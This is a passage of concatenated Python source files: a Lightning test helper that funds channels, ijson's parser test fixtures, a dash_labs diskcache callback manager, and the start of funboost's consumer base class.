assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
raise Exception("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail
|
test_base.py
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
import collections
import ctypes
import unittest
from decimal import Decimal
import threading
import ijson
from ijson import common, compat
from ijson.compat import b2s, IS_PY2
import warnings
JSON = b'''
{
"docs": [
{
"null": null,
"boolean": false,
"true": true,
"integer": 0,
"double": 0.5,
"exponent": 1.0e+2,
"long": 10000000000,
"string": "\\u0441\\u0442\\u0440\\u043e\\u043a\\u0430 - \xd1\x82\xd0\xb5\xd1\x81\xd1\x82",
"\xc3\xb1and\xc3\xba": null
},
{
"meta": [[1], {}]
},
{
"meta": {"key": "value"}
},
{
"meta": null
},
{
"meta": []
}
]
}
'''
JSON_OBJECT = {
"docs": [
{
"null": None,
"boolean": False,
"true": True,
"integer": 0,
"double": Decimal("0.5"),
"exponent": 1e+2,
"long": 10000000000,
"string": "строка - тест",
"ñandú": None
},
{
"meta": [[1], {}]
},
{
"meta": {
"key": "value"
}
},
{
"meta": None
},
{
"meta": []
}
]
}
JSON_PARSE_EVENTS = [
('', 'start_map', None),
('', 'map_key', 'docs'),
('docs', 'start_array', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'null'),
('docs.item.null', 'null', None),
('docs.item', 'map_key', 'boolean'),
('docs.item.boolean', 'boolean', False),
('docs.item', 'map_key', 'true'),
('docs.item.true', 'boolean', True),
('docs.item', 'map_key', 'integer'),
('docs.item.integer', 'number', 0),
('docs.item', 'map_key', 'double'),
('docs.item.double', 'number', Decimal('0.5')),
('docs.item', 'map_key', 'exponent'),
('docs.item.exponent', 'number', Decimal('1.0E+2')),
('docs.item', 'map_key', 'long'),
('docs.item.long', 'number', 10000000000),
('docs.item', 'map_key', 'string'),
('docs.item.string', 'string', 'строка - тест'),
('docs.item', 'map_key', 'ñandú'),
('docs.item.ñandú', 'null', None),
('docs.item', 'end_map', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'meta'),
('docs.item.meta', 'start_array', None),
('docs.item.meta.item', 'start_array', None),
('docs.item.meta.item.item', 'number', 1),
('docs.item.meta.item', 'end_array', None),
('docs.item.meta.item', 'start_map', None),
('docs.item.meta.item', 'end_map', None),
('docs.item.meta', 'end_array', None),
('docs.item', 'end_map', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'meta'),
('docs.item.meta', 'start_map', None),
('docs.item.meta', 'map_key', 'key'),
('docs.item.meta.key', 'string', 'value'),
('docs.item.meta', 'end_map', None),
('docs.item', 'end_map', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'meta'),
('docs.item.meta', 'null', None),
('docs.item', 'end_map', None),
('docs.item', 'start_map', None),
('docs.item', 'map_key', 'meta'),
('docs.item.meta', 'start_array', None),
('docs.item.meta', 'end_array', None),
('docs.item', 'end_map', None),
('docs', 'end_array', None),
('', 'end_map', None)
]
JSON_KVITEMS = [
("null", None),
("boolean", False),
("true", True),
("integer", 0),
("double", Decimal("0.5")),
("exponent", 1e+2),
("long", 10000000000),
("string", "строка - тест"),
("ñandú", None),
("meta", [[1], {}]),
("meta", {"key": "value"}),
("meta", None),
("meta", [])
]
JSON_KVITEMS_META = [
('key', 'value')
]
JSON_EVENTS = [
('start_map', None),
('map_key', 'docs'),
('start_array', None),
('start_map', None),
('map_key', 'null'),
('null', None),
('map_key', 'boolean'),
('boolean', False),
('map_key', 'true'),
('boolean', True),
('map_key', 'integer'),
('number', 0),
('map_key', 'double'),
('number', Decimal('0.5')),
('map_key', 'exponent'),
('number', 100),
('map_key', 'long'),
('number', 10000000000),
('map_key', 'string'),
('string', 'строка - тест'),
('map_key', 'ñandú'),
('null', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_array', None),
('start_array', None),
('number', 1),
('end_array', None),
('start_map', None),
('end_map', None),
('end_array', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_map', None),
('map_key', 'key'),
('string', 'value'),
('end_map', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('null', None),
('end_map', None),
('start_map', None),
('map_key', 'meta'),
('start_array', None),
('end_array', None),
('end_map', None),
('end_array', None),
('end_map', None),
]
# Like JSON, but with an additional top-level array structure
ARRAY_JSON = b'[' + JSON + b']'
ARRAY_JSON_EVENTS = (
[('start_array', None)] +
JSON_EVENTS +
[('end_array', None)]
)
ARRAY_JSON_PARSE_EVENTS = (
[('', 'start_array', None)] +
[('.'.join(filter(None, ('item', p))), t, e) for p, t, e in JSON_PARSE_EVENTS] +
[('', 'end_array', None)]
)
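# Wrapping the document in a top-level array prefixes every nested path with
# 'item'; filter(None, ...) avoids a leading dot when the original prefix is
# empty.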
ARRAY_JSON_OBJECT = [JSON_OBJECT]
SCALAR_JSON = b'0'
INVALID_JSONS = [
b'["key", "value",]', # trailing comma
b'["key" "value"]', # no comma
b'{"key": "value",}', # trailing comma
b'{"key": "value" "key"}', # no comma
b'{"key" "value"}', # no colon
b'invalid', # unknown lexeme
b'[1, 2] dangling junk', # dangling junk
b'}', # no corresponding opening token
b']', # no corresponding opening token
b'"\xa8"' # invalid UTF-8 byte sequence
]
YAJL1_PASSING_INVALID = INVALID_JSONS[6]
INCOMPLETE_JSONS = [
b'',
b'"test',
b'[',
b'[1',
b'[1,',
b'{',
b'{"key"',
b'{"key":',
b'{"key": "value"',
b'{"key": "value",',
]
INCOMPLETE_JSON_TOKENS = [
b'n',
b'nu',
b'nul',
b't',
b'tr',
b'tru',
b'f',
b'fa',
b'fal',
b'fals',
b'[f',
b'[fa',
b'[fal',
b'[fals',
b'[t',
b'[tr',
b'[tru',
b'[n',
b'[nu',
b'[nul',
b'{"key": t',
b'{"key": tr',
b'{"key": tru',
b'{"key": f',
b'{"key": fa',
b'{"key": fal',
b'{"key": fals',
b'{"key": n',
b'{"key": nu',
b'{"key": nul',
]
STRINGS_JSON = br'''
{
"str1": "",
"str2": "\"",
"str3": "\\",
"str4": "\\\\",
"special\t": "\b\f\n\r\t"
}
'''
SURROGATE_PAIRS_JSON = br'"\uD83D\uDCA9"'
PARTIAL_ARRAY_JSONS = [
(b'[1,', 1),
(b'[1, 2 ', 1, 2),
(b'[1, "abc"', 1, 'abc'),
(b'[{"abc": [0, 1]}', {'abc': [0, 1]}),
(b'[{"abc": [0, 1]},', {'abc': [0, 1]}),
]
items_test_case = collections.namedtuple('items_test_case', 'json, prefix, kvitems, items')
EMPTY_MEMBER_TEST_CASES = {
'simple': items_test_case(
b'{"a": {"": {"b": 1, "c": 2}}}',
'a.',
[("b", 1), ("c", 2)],
[{"b": 1, "c": 2}]
),
'embedded': items_test_case(
b'{"a": {"": {"": {"b": 1, "c": 2}}}}',
'a..',
[("b", 1), ("c", 2)],
[{"b": 1, "c": 2}]
),
'top_level': items_test_case(
b'{"": 1, "a": 2}',
'',
[("", 1), ("a", 2)],
[{"": 1, "a": 2}]
),
'top_level_embedded': items_test_case(
b'{"": {"": 1}, "a": 2}',
'',
[("", {"": 1}), ("a", 2)],
[{"": {"": 1}, "a": 2}]
)
}
class warning_catcher(object):
'''Encapsulates proper warning catch-all logic in python 2.7 and 3'''
def __init__(self):
self.catcher = warnings.catch_warnings(record=True)
def __enter__(self):
ret = self.catcher.__enter__()
if compat.IS_PY2:
warnings.simplefilter("always")
return ret
def __exit__(self, *args):
self.catcher.__exit__(*args)
class BackendSpecificTestCase(object):
'''
Base class for backend-specific tests; gives the ability to easily and
generically reference different methods on the backend. It requires
subclasses to define a `backend` member with the backend module, and a
`method_suffix` attribute indicating the method flavour to obtain.
'''
def __getattr__(self, name):
return getattr(self.backend, name + self.method_suffix)
class IJsonTestsBase(object):
'''
Base class with common tests for all iteration methods.
Subclasses implement `get_all()` and `get_first()` to collect events coming from
a particular method.
'''
def test_basic_parse(self):
events = self.get_all(self.basic_parse, JSON)
self.assertEqual(events, JSON_EVENTS)
def test_basic_parse_threaded(self):
thread = threading.Thread(target=self.test_basic_parse)
thread.start()
thread.join()
def test_parse(self):
events = self.get_all(self.parse, JSON)
self.assertEqual(events, JSON_PARSE_EVENTS)
def test_items(self):
events = self.get_all(self.items, JSON, '')
self.assertEqual(events, [JSON_OBJECT])
def test_items_twodictlevels(self):
json = b'{"meta":{"view":{"columns":[{"id": -1}, {"id": -2}]}}}'
ids = self.get_all(self.items, json, 'meta.view.columns.item.id')
self.assertEqual(2, len(ids))
self.assertListEqual([-2,-1], sorted(ids))
def test_items_with_dotted_name(self):
json = b'{"0.1": 0}'
self.assertListEqual([0], self.get_all(self.items, json, '0.1'))
json = b'{"0.1": [{"a.b": 0}]}'
self.assertListEqual([0], self.get_all(self.items, json, '0.1.item.a.b'))
json = b'{"0.1": 0, "0": {"1": 1}}'
self.assertListEqual([0, 1], self.get_all(self.items, json, '0.1'))
json = b'{"abc.def": 0}'
self.assertListEqual([0], self.get_all(self.items, json, 'abc.def'))
self.assertListEqual([], self.get_all(self.items, json, 'abc'))
self.assertListEqual([], self.get_all(self.items, json, 'def'))
def test_map_type(self):
obj = self.get_first(self.items, JSON, '')
self.assertTrue(isinstance(obj, dict))
obj = self.get_first(self.items, JSON, '', map_type=collections.OrderedDict)
self.assertTrue(isinstance(obj, collections.OrderedDict))
def test_kvitems(self):
kvitems = self.get_all(self.kvitems, JSON, 'docs.item')
self.assertEqual(JSON_KVITEMS, kvitems)
def test_kvitems_toplevel(self):
kvitems = self.get_all(self.kvitems, JSON, '')
self.assertEqual(1, len(kvitems))
key, value = kvitems[0]
self.assertEqual('docs', key)
self.assertEqual(JSON_OBJECT['docs'], value)
def test_kvitems_empty(self):
kvitems = self.get_all(self.kvitems, JSON, 'docs')
self.assertEqual([], kvitems)
def test_kvitems_twodictlevels(self):
json = b'{"meta":{"view":{"columns":[{"id": -1}, {"id": -2}]}}}'
view = self.get_all(self.kvitems, json, 'meta.view')
self.assertEqual(1, len(view))
key, value = view[0]
self.assertEqual('columns', key)
self.assertEqual([{'id': -1}, {'id': -2}], value)
def test_kvitems_different_underlying_types(self):
kvitems = self.get_all(self.kvitems, JSON, 'docs.item.meta')
self.assertEqual(JSON_KVITEMS_META, kvitems)
def test_basic_parse_array(self):
events = self.get_all(self.basic_parse, ARRAY_JSON)
self.assertEqual(events, ARRAY_JSON_EVENTS)
def test_basic_parse_array_threaded(self):
thread = threading.Thread(target=self.test_basic_parse_array)
thread.start()
thread.join()
def test_parse_array(self):
events = self.get_all(self.parse, ARRAY_JSON)
self.assertEqual(events, ARRAY_JSON_PARSE_EVENTS)
def test_items_array(self):
events = self.get_all(self.items, ARRAY_JSON, '')
self.assertEqual(events, [ARRAY_JSON_OBJECT])
def test_kvitems_array(self):
kvitems = self.get_all(self.kvitems, ARRAY_JSON, 'item.docs.item')
self.assertEqual(JSON_KVITEMS, kvitems)
def test_scalar(self):
events = self.get_all(self.basic_parse, SCALAR_JSON)
self.assertEqual(events, [('number', 0)])
def test_strings(self):
events = self.get_all(self.basic_parse, STRINGS_JSON)
strings = [value for event, value in events if event == 'string']
self.assertEqual(strings, ['', '"', '\\', '\\\\', '\b\f\n\r\t'])
self.assertTrue(('map_key', 'special\t') in events)
def test_surrogate_pairs(self):
event = self.get_first(self.basic_parse, SURROGATE_PAIRS_JSON)
parsed_string = event[1]
self.assertEqual(parsed_string, '💩')
def test_numbers(self):
"""Check that numbers are correctly parsed"""
def get_numbers(json, **kwargs):
events = self.get_all(self.basic_parse, json, **kwargs)
return events, [value for event, value in events if event == 'number']
def assert_numbers(json, expected_float_type, *numbers, **kwargs):
events, values = get_numbers(json, **kwargs)
float_types = set(type(value) for event, value in events if event == 'number')
float_types -= {int}
self.assertEqual(1, len(float_types))
self.assertEqual(next(iter(float_types)), expected_float_type)
self.assertSequenceEqual(numbers, values)
NUMBERS_JSON = b'[1, 1.0, 1E2]'
assert_numbers(NUMBERS_JSON, Decimal, 1, Decimal("1.0"), Decimal("1e2"))
assert_numbers(NUMBERS_JSON, float, 1, 1., 100., use_float=True)
assert_numbers(b'1e400', Decimal, Decimal('1e400'))
assert_numbers(b'1e-400', Decimal, Decimal('1e-400'))
assert_numbers(b'1e-400', float, 0., use_float=True)
# Test for 64-bit integers support when using use_float=True
try:
past32bits = 2 ** 32 + 1
received = get_numbers(('%d' % past32bits).encode('utf8'), use_float=True)[1][0]
self.assertTrue(self.supports_64bit_integers)
self.assertEqual(past32bits, received)
except common.JSONError:
self.assertFalse(self.supports_64bit_integers)
# Check that numbers bigger than MAX_DOUBLE cannot be represented
try:
get_numbers(b'1e400', use_float=True)
self.fail("Overflow error expected")
except common.JSONError:
pass
def test_invalid_numbers(self):
# leading zeros
if self.detects_leading_zeros:
for case in (b'00', b'01', b'001'):
for base in (case, case + b'.0', case + b'e0', case + b'E0'):
for n in (base, b'-' + base):
with self.assertRaises(common.JSONError):
self.get_all(self.basic_parse, n)
# incomplete exponents
for n in (b'1e', b'0.1e', b'0E'):
with self.assertRaises(common.JSONError):
self.get_all(self.basic_parse, n)
# incomplete fractions
for n in (b'1.', b'.1'):
with self.assertRaises(common.JSONError):
self.get_all(self.basic_parse, n)
def test_incomplete(self):
for json in INCOMPLETE_JSONS:
with self.assertRaises(common.IncompleteJSONError):
self.get_all(self.basic_parse, json)
def test_incomplete_tokens(self):
if not self.handles_incomplete_json_tokens:
return
for json in INCOMPLETE_JSON_TOKENS:
with self.assertRaises(common.IncompleteJSONError):
self.get_all(self.basic_parse, json)
def test_invalid(self):
for json in INVALID_JSONS:
# Yajl1 doesn't complain about additional data after the end
# of a parsed object. Skipping this test.
if self.backend_name == 'yajl' and json == YAJL1_PASSING_INVALID:
continue
with self.assertRaises(common.JSONError):
self.get_all(self.basic_parse, json)
def test_multiple_values(self):
"""Test that the multiple_values flag works"""
if not self.supports_multiple_values:
with self.assertRaises(ValueError):
self.get_all(self.basic_parse, "", multiple_values=True)
return
multiple_json = JSON + JSON + JSON
items = lambda x, **kwargs: self.items(x, '', **kwargs)
for func in (self.basic_parse, items):
with self.assertRaises(common.JSONError):
self.get_all(func, multiple_json)
with self.assertRaises(common.JSONError):
self.get_all(func, multiple_json, multiple_values=False)
result = self.get_all(func, multiple_json, multiple_values=True)
if func == items:
self.assertEqual(result, [JSON_OBJECT, JSON_OBJECT, JSON_OBJECT])
else:
self.assertEqual(result, JSON_EVENTS + JSON_EVENTS + JSON_EVENTS)
def test_comments(self):
json = b'{"a": 2 /* a comment */}'
try:
self.get_all(self.basic_parse, json, allow_comments=True)
except ValueError:
if self.supports_comments:
raise
def _test_empty_member(self, test_case):
pairs = self.get_all(self.kvitems, test_case.json, test_case.prefix)
self.assertEqual(test_case.kvitems, pairs)
objects = self.get_all(self.items, test_case.json, test_case.prefix)
self.assertEqual(test_case.items, objects)
def test_empty_member(self):
self._test_empty_member(EMPTY_MEMBER_TEST_CASES['simple'])
def test_embedded_empty_member(self):
self._test_empty_member(EMPTY_MEMBER_TEST_CASES['embedded'])
def test_top_level_empty_member(self):
self._test_empty_member(EMPTY_MEMBER_TEST_CASES['top_level'])
def test_top_level_embedded_empty_member(self):
self._test_empty_member(EMPTY_MEMBER_TEST_CASES['top_level_embedded'])
class FileBasedTests(object):
def test_string_stream(self):
with warning_catcher() as warns:
events = self.get_all(self.basic_parse, b2s(JSON))
self.assertEqual(events, JSON_EVENTS)
if self.warn_on_string_stream:
self.assertEqual(len(warns), 1)
self.assertEqual(DeprecationWarning, warns[0].category)
def test_different_buf_sizes(self):
for buf_size in (1, 4, 16, 64, 256, 1024, 4098):
events = self.get_all(self.basic_parse, JSON, buf_size=buf_size)
self.assertEqual(events, JSON_EVENTS)
def generate_backend_specific_tests(module, classname_prefix, method_suffix,
*bases, **kwargs):
for backend in ['python', 'yajl', 'yajl2', 'yajl2_cffi', 'yajl2_c']:
try:
classname = '%s%sTests' % (
''.join(p.capitalize() for p in backend.split('_')),
classname_prefix
)
if IS_PY2:
classname = classname.encode('ascii')
_bases = bases + (BackendSpecificTestCase, unittest.TestCase)
_members = {
'backend_name': backend,
'backend': ijson.get_backend(backend),
'method_suffix': method_suffix,
'warn_on_string_stream': not IS_PY2,
'supports_64bit_integers': not (backend == 'yajl' and ctypes.sizeof(ctypes.c_long) == 4)
}
members = kwargs.get('members', lambda _: {})
_members.update(members(backend))
module[classname] = type(classname, _bases, _members)
except ImportError:
pass
def generate_test_cases(module, classname, method_suffix, *bases):
_bases = bases + (IJsonTestsBase,)
members = lambda name: {
'get_all': lambda self, *args, **kwargs: module['get_all'](*args, **kwargs),
'get_first': lambda self, *args, **kwargs: module['get_first'](*args, **kwargs),
'supports_multiple_values': name != 'yajl',
'supports_comments': name != 'python',
'detects_leading_zeros': name != 'yajl',
'handles_incomplete_json_tokens': name != 'yajl'
}
return generate_backend_specific_tests(module, classname, method_suffix,
members=members, *_bases)
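# A minimal sketch (not part of the original module) of how the helpers above are meant to be driven from a concrete
# backend test module. The get_all/get_first wrappers below are illustrative assumptions; real ijson test modules wrap
# each backend routine in their own way (generator, coroutine, async, ...), and the '_gen' suffix here is hypothetical.
if __name__ == '__main__':  # pragma: no cover - illustrative only
    import io

    def get_all(routine, json_content, **kwargs):
        # Exhaust a generator-style routine over an in-memory byte buffer.
        return list(routine(io.BytesIO(json_content), **kwargs))

    def get_first(routine, json_content, **kwargs):
        # Return only the first item yielded by the routine.
        return next(iter(routine(io.BytesIO(json_content), **kwargs)))

    generate_test_cases(globals(), 'Generators', '_gen', FileBasedTests)
    unittest.main()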
|
diskcache_manager.py
|
import platform
from dash_labs.plugins.long_callback.managers import BaseLongCallbackManager
class DiskcacheCachingCallbackManager(BaseLongCallbackManager):
def __init__(self, cache, cache_by=None, expire=None):
import diskcache
if not isinstance(cache, diskcache.Cache):
raise ValueError("First argument must be a diskcache.Cache object")
super().__init__(cache_by)
# Handle process class import
if platform.system() == "Windows":
try:
from multiprocess import Process
except ImportError:
raise ImportError(
"""\
When running on Windows, the long_callback decorator requires the
multiprocess package, which can be installed using pip:
    $ pip install multiprocess
or conda:
    $ conda install -c conda-forge multiprocess\n"""
)
else:
from multiprocessing import Process
self.Process = Process
self.cache = cache
self.callback_futures = dict()
self.expire = expire
def init(self, app):
pass
def delete_future(self, key):
if key in self.callback_futures:
future = self.callback_futures.pop(key, None)
if future:
future.kill()
future.join()
return True
return False
def clear_cache_entry(self, key):
self.cache.delete(key)
def terminate_unhealthy_future(self, key):
return False
def has_future(self, key):
return self.callback_futures.get(key, None) is not None
def get_future(self, key, default=None):
return self.callback_futures.get(key, default)
def make_background_fn(self, fn, progress=False):
return make_update_cache(fn, self.cache, progress, self.expire)
@staticmethod
def _make_progress_key(key):
return key + "-progress"
def call_and_register_background_fn(self, key, background_fn, args):
self.delete_future(key)
future = self.Process(
target=background_fn, args=(key, self._make_progress_key(key), args)
)
future.start()
self.callback_futures[key] = future
def get_progress(self, key):
future = self.get_future(key)
if future is not None:
progress_key = self._make_progress_key(key)
return self.cache.get(progress_key)
return None
def result_ready(self, key):
return self.cache.get(key) not in (None, "__undefined__")
def get_result(self, key):
# Get result value
result = self.cache.get(key)
if result == "__undefined__":
result = None
# Clear result if not caching
if self.cache_by is None and result is not None:
self.clear_cache_entry(key)
# Always delete_future (even if we didn't clear cache) so that we can
# handle the case where cache entry is cleared externally.
self.delete_future(key)
return result
def make_update_cache(fn, cache, progress, expire):
def _callback(result_key, progress_key, user_callback_args):
def _set_progress(progress_value):
cache.set(progress_key, progress_value)
maybe_progress = [_set_progress] if progress else []
if isinstance(user_callback_args, dict):
user_callback_output = fn(*maybe_progress, **user_callback_args)
elif isinstance(user_callback_args, list):
user_callback_output = fn(*maybe_progress, *user_callback_args)
else:
user_callback_output = fn(*maybe_progress, user_callback_args)
cache.set(result_key, user_callback_output, expire=expire)
return _callback
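# A minimal usage sketch (not part of the original module), assuming the diskcache package is installed. It drives
# DiskcacheCachingCallbackManager directly, without a Dash app, just to show the key / background-process / result flow.
# The function and key names are illustrative. On Linux the fork start method lets the nested background function be
# passed to a child process as-is; on Windows the multiprocess import above handles pickling of such closures.
def _demo_add_one(x):
    return x + 1

def _demo_diskcache_manager():  # pragma: no cover - illustrative only
    import time
    import diskcache

    manager = DiskcacheCachingCallbackManager(diskcache.Cache("./demo_cache"), expire=60)
    background_fn = manager.make_background_fn(_demo_add_one, progress=False)

    key = "demo-key"
    manager.call_and_register_background_fn(key, background_fn, 41)  # runs _demo_add_one(41) in a child process
    while not manager.result_ready(key):
        time.sleep(0.1)
    print(manager.get_result(key))  # -> 42; the cache entry is then cleared because cache_by is None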
|
base_consumer.py
|
# -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 13:11
"""
Abstract base class for the consumers of every broker type, so that implementing a consumer for a new broker needs as little code as possible.
The hardest part of the whole pipeline lives here: it implements several concurrency models and applies some twenty kinds of runtime control to the consuming function, which is why the code is so long.
"""
import typing
import abc
import copy
from pathlib import Path
# from multiprocessing import Process
import datetime
# noinspection PyUnresolvedReferences,PyPackageRequirements
import pytz
import json
import logging
import sys
import atexit
import socket
import os
import uuid
import time
import traceback
# from collections import Callable
from typing import Callable
from functools import wraps
import threading
from threading import Lock, Thread
import eventlet
import gevent
import asyncio
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.executors.pool import ThreadPoolExecutor as ApschedulerThreadPoolExecutor
from apscheduler.events import EVENT_JOB_MISSED
from funboost.concurrent_pool.single_thread_executor import SoloExecutor
from funboost.helpers import FunctionResultStatusPersistanceConfig
from funboost.utils.apscheduler_monkey import patch_run_job as patch_apscheduler_run_job
import pymongo
from pymongo import IndexModel
from pymongo.errors import PyMongoError
# noinspection PyUnresolvedReferences
from nb_log import get_logger, LoggerLevelSetterMixin, LogManager, nb_print, LoggerMixin, \
LoggerMixinDefaultWithFileHandler, stdout_write, stderr_write, is_main_process, \
only_print_on_main_process, nb_log_config_default
# noinspection PyUnresolvedReferences
from funboost.concurrent_pool.async_helper import simple_run_in_executor
from funboost.concurrent_pool.async_pool_executor import AsyncPoolExecutor
# noinspection PyUnresolvedReferences
from funboost.concurrent_pool.bounded_threadpoolexcutor import \
BoundedThreadPoolExecutor
from funboost.concurrent_pool.custom_evenlet_pool_executor import evenlet_timeout_deco, \
check_evenlet_monkey_patch, CustomEventletPoolExecutor
from funboost.concurrent_pool.custom_gevent_pool_executor import gevent_timeout_deco, \
GeventPoolExecutor, check_gevent_monkey_patch
from funboost.concurrent_pool.custom_threadpool_executor import \
CustomThreadPoolExecutor, check_not_monkey
# from funboost.concurrent_pool.concurrent_pool_with_multi_process import ConcurrentPoolWithProcess
from funboost.consumers.redis_filter import RedisFilter, RedisImpermanencyFilter
from funboost.factories.publisher_factotry import get_publisher
from funboost.utils import decorators, time_util, RedisMixin, un_strict_json_dumps
# noinspection PyUnresolvedReferences
from funboost.utils.bulk_operation import MongoBulkWriteHelper, InsertOne
from funboost.utils.mongo_util import MongoMixin
from funboost import funboost_config_deafult
# noinspection PyUnresolvedReferences
from funboost.constant import ConcurrentModeEnum, BrokerEnum
patch_apscheduler_run_job()
def _delete_keys_and_return_new_dict(dictx: dict, keys: list = None):
    dict_new = copy.copy(dictx)  # Mainly to drop top-level control keys such as publish_time; a shallow copy is enough.
keys = ['publish_time', 'publish_time_format', 'extra'] if keys is None else keys
for dict_key in keys:
try:
dict_new.pop(dict_key)
except KeyError:
pass
return dict_new
class ExceptionForRetry(Exception):
"""为了重试的,抛出错误。只是定义了一个子类,用不用都可以,函数出任何类型错误了框架都会自动重试"""
class ExceptionForRequeue(Exception):
"""框架检测到此错误,重新放回队列中"""
def _get_publish_time(paramsx: dict):
"""
    The original location for control parameters was not well chosen; it is recommended to put all control parameters inside the dict stored under the 'extra' key.
:param paramsx:
:return:
"""
return paramsx.get('extra', {}).get('publish_time', None) or paramsx.get('publish_time', None)
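# A small illustrative sketch (not part of the original module) of how the two helpers above behave on a typical
# message body; all field values below are made up.
def _demo_control_key_helpers():  # pragma: no cover - illustrative only
    demo_msg = {'x': 1, 'y': 2,
                'publish_time': 1640604084.0,
                'publish_time_format': '2021-12-27 19:21:24',
                'extra': {'task_id': 'demo-task-id', 'publish_time': 1640604084.0}}
    print(_get_publish_time(demo_msg))  # -> 1640604084.0, extra.publish_time takes precedence
    print(_delete_keys_and_return_new_dict(demo_msg))  # -> {'x': 1, 'y': 2}, only the function's own keyword arguments remain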
class FunctionResultStatus(LoggerMixin, LoggerLevelSetterMixin):
host_name = socket.gethostname()
host_process = f'{host_name} - {os.getpid()}'
script_name_long = sys.argv[0]
script_name = script_name_long.split('/')[-1].split('\\')[-1]
def __init__(self, queue_name: str, fucntion_name: str, msg_dict: dict):
# print(params)
self.queue_name = queue_name
self.function = fucntion_name
self.msg_dict = msg_dict
self.task_id = self.msg_dict.get('extra', {}).get('task_id', '')
self.process_id = os.getpid()
self.thread_id = threading.get_ident()
self.publish_time = publish_time = _get_publish_time(msg_dict)
if publish_time:
self.publish_time_str = time_util.DatetimeConverter(publish_time).datetime_str
function_params = _delete_keys_and_return_new_dict(msg_dict, )
self.params = function_params
self.params_str = json.dumps(function_params, ensure_ascii=False)
self.result = None
self.run_times = 0
self.exception = None
self.time_start = time.time()
self.time_cost = None
self.time_end = None
self.success = False
self.total_thread = threading.active_count()
self.has_requeue = False
self.set_log_level(20)
def get_status_dict(self, without_datetime_obj=False):
self.time_end = time.time()
self.time_cost = round(self.time_end - self.time_start, 3)
item = self.__dict__
item['host_name'] = self.host_name
item['host_process'] = self.host_process
item['script_name'] = self.script_name
item['script_name_long'] = self.script_name_long
# item.pop('time_start')
datetime_str = time_util.DatetimeConverter().datetime_str
try:
            json.dumps(item['result'])  # We do not want to store complex results that cannot be JSON-serialized; persisting such results is a non-requirement and only causes trouble.
except TypeError:
item['result'] = str(item['result'])[:1000]
item.update({'insert_time_str': datetime_str,
'insert_minutes': datetime_str[:-3],
})
if not without_datetime_obj:
item.update({'insert_time': datetime.datetime.now(),
'utime': datetime.datetime.utcnow(),
})
else:
item = _delete_keys_and_return_new_dict(item, ['insert_time', 'utime'])
# kw['body']['extra']['task_id']
# item['_id'] = self.task_id.split(':')[-1] or str(uuid.uuid4())
item['_id'] = self.task_id or str(uuid.uuid4())
# self.logger.warning(item['_id'])
# self.logger.warning(item)
return item
class ResultPersistenceHelper(MongoMixin, LoggerMixin):
def __init__(self, function_result_status_persistance_conf: FunctionResultStatusPersistanceConfig, queue_name):
self.function_result_status_persistance_conf = function_result_status_persistance_conf
self._bulk_list = []
self._bulk_list_lock = Lock()
self._last_bulk_insert_time = 0
if self.function_result_status_persistance_conf.is_save_status:
task_status_col = self.mongo_db_task_status.get_collection(queue_name)
try:
                # If params_str can be long, a TEXT or HASHED index must be used.
task_status_col.create_indexes([IndexModel([("insert_time_str", -1)]), IndexModel([("insert_time", -1)]),
IndexModel([("params_str", pymongo.TEXT)]), IndexModel([("success", 1)])
], )
task_status_col.create_index([("utime", 1)],
                                             expireAfterSeconds=function_result_status_persistance_conf.expire_seconds)  # Only keep records for 7 days (user-configurable).
            except pymongo.errors.OperationFailure as e:  # Newer mongo servers raise an error when an already-existing index is re-created at every startup, hence the try.
self.logger.warning(e)
# self._mongo_bulk_write_helper = MongoBulkWriteHelper(task_status_col, 100, 2)
self.task_status_col = task_status_col
